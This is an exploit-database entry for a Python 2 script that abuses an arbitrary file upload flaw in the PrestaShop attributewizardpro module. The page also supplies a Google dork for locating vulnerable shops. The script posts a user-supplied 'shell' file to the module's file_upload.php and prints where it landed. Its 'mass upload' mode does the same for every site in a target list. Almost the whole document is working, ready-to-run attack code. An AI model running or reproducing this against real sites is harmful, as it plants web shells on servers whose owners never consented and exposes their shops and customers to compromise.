Prestashop Attribute Wizard Pro module Arbitrary File Upload Exploit



EKU-ID: 5655 CVE: OSVDB-ID:
Author: PentesterDesk Published: 2016-06-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: [Prestashop  attributewizardpro module Arbitrary File Upload exploit]
# Google Dork: [inurl:/modules/attributewizardpro/]
# Date: [29-july-2016]
# Exploit Author: [PentesterDesk]
# Vendor Homepage: [https://www.prestashop.com/en/download]
# Tested on: [debain os]
#Greets to : TO all indian hackers & special thanks to Muhammad Faisal Gunanda
=====================================================================
 
#!/usr/bin/python
####################################################################################
#Author  : PentesterDesk
#Date    : 29-June-2016
#Software: Prestashop CMS
#vuln Mod: attributewizardpro
####################################################################################
import sys, os
import requests
def main():
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
 
        banner = '''
 
                        +======================================================+
                        |    Prestashop  |  FileUpload Exp   |  PentesterDesk  |
                        |         Coded by : PentesterDesk Team                |
                        |         Contact  : pentesterdesk@gmail.com           |
                        +======================================================+
                        '''
        print banner
 
#/modules/attributewizardpro/
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
        print banner
        print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
        print "[1] Single Site "
        print "[2] Mass Upload"
        ch=raw_input("\n[>] ")
        if ch == '1':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
                print banner
        
                print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
 
                url = raw_input("[+] Enter Url  : ")
                filname= raw_input("[+] Enter File : ")
                if filname == '' or url == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        main()
                url = url + "/modules/attributewizardpro/file_upload.php"
#main
                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                req=requests.post(url,files=files)
                final =[]
                final = (req.text).split("||||")
                if req.status_code == 200 and filname in req.text:
                        url=url.replace('/file_upload.php','/file_uploads/'+final[0])
                        print ("[+] %s [ok]" % (url))
                else:
                        print "\n[+] %s [no]\n" %url
                        raw_input("\n[+] Press Enter [>] ")
#mass
        if ch == '2':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
                print banner
                print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
                filee = raw_input("[+] Enter List  Name : ")
                filname= raw_input("[+] Enter Shell Name : ")
                if filname == '' or filee == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        main()
                ob = open(filee,'r')
                lists = ob.readlines()
                list1 = []
                i = 0
                for i in range(len(lists)):
                        list1.append(lists[i].strip('\n'))
                count = 0
                for site in (list1):
                        count = count + 1
                        url = site + "/modules/attributewizardpro/file_upload.php"
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        final =[]
                        final = (req.text).split("||||")
                        if req.status_code == 200 and filname in req.text:
                                url=url.replace('/file_upload.php','/file_uploads/'+final[0])
                                print ("[%d] %s [ ok ]" % (count,url))
                        else:
                                print ("[%d]  %s [ No ]" % (count,url))
if __name__ == "__main__":
    main()